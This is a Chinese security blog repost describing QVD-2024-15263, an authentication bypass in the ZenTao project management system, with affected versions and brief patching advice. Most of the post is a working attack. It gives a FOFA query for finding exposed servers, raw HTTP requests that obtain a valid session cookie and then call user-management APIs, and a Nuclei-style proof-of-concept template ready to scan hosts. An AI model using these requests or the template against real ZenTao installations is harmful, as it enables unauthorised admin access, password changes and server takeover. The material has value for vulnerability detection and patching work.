QVD-2024-15263禅道项目管理系统身份认证绕过

admin
admin
admin
104366
文章
87
评论
2024年4月30日08:45:46评论65 views字数 2707阅读9分1秒阅读模式

产品概述

禅道(ZenTao)是一款国产的,基于LGPL协议和敏捷方法scrum,开源免费的项目管理软件。禅道内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期的全面覆盖。

QVD-2024-15263禅道项目管理系统身份认证绕过

漏洞描述

禅道项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发项目管理的核心流程。
禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器。

影响版本

16.x <= 禅道项目管理系统< 18.12(开源版)
6.x <= 禅道项目管理系统< 8.12(企业版)
3.x <= 禅道项目管理系统< 4.12(旗舰版)

FoFa语句

app="易软天创-禅道系统"

首先获取cookie

  • 获取有效cookie后,可以根据API手册构造请求包,例如,添加用户。回显状态码403则表示添加成功。
  • 官方手册地址:https://www.zentao.net/book/api/setting-369.html
GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=hxsjoqkyiveutbzwlvjv&branch=rbpcotcxawqpqhvhqfpp HTTP/1.1Host: your-ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9sec-ch-ua-platform: "Windows"sec-ch-ua: "Google Chrome";v="109", "Chromium";v="109", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: close

QVD-2024-15263禅道项目管理系统身份认证绕过

带cookie访问

GET /api.php/v1/users HTTP/1.1Host: User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: zentaosid=u7i38b0judkg2rgjgqcv7lh312

返回包中出现字段:error: no company-browse priv 证明漏洞存在

POC

id: Zentao_Authentication_Bypass

info:  name: Zentao_Authentication_Bypass  author: xiaoming  severity: high  description: Zen Tao Project Management System Identity Authentication Bypass( QVD-2024-15263)  metadata:    max-request: 2    shodan-query: ""    verified: true

http:- raw:  - |+    @timeout: 30s    GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=hxsjoqkyiveutbzwlvjv&branch=rbpcotcxawqpqhvhqfpp HTTP/1.1    Host: {{Hostname}}    Upgrade-Insecure-Requests: 1    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7    Accept-Encoding: gzip, deflate    Accept-Language: zh-CN,zh;q=0.9    sec-ch-ua-platform: "Windows"    sec-ch-ua: "Google Chrome";v="109", "Chromium";v="109", "Not=A?Brand";v="24"    sec-ch-ua-mobile: ?0    Connection: close

  - |+    @timeout: 30s    POST /api.php/v1/users HTTP/1.1    Cookie: zentaosid=06cc7df8420574cf12a403d16cf3f5d9;    Host: {{Hostname}}

  max-redirects: 3  cookie-reuse: true  matchers-condition: and  matchers:  - type: word    part: body    words:    - u300eu7528u6237u540du300fu4e0du80fdu4e3au7a7au3002    condition: and

漏洞修复

1、在Web应用防火墙中添加接口临时黑名单规则。

2、联系厂商打补丁或升级版本。

参考链接

https://mp.weixin.qq.com/s/I3YmlAshgLZCEk9ToDa0Fghttps://blog.csdn.net/huangyongkang666/article/details/138253899

原文始发于微信公众号(巢安实验室):QVD-2024-15263禅道项目管理系统身份认证绕过

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月30日08:45:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   QVD-2024-15263禅道项目管理系统身份认证绕过http://cn-sec.com/archives/2698994.html

发表评论

匿名网友 填写信息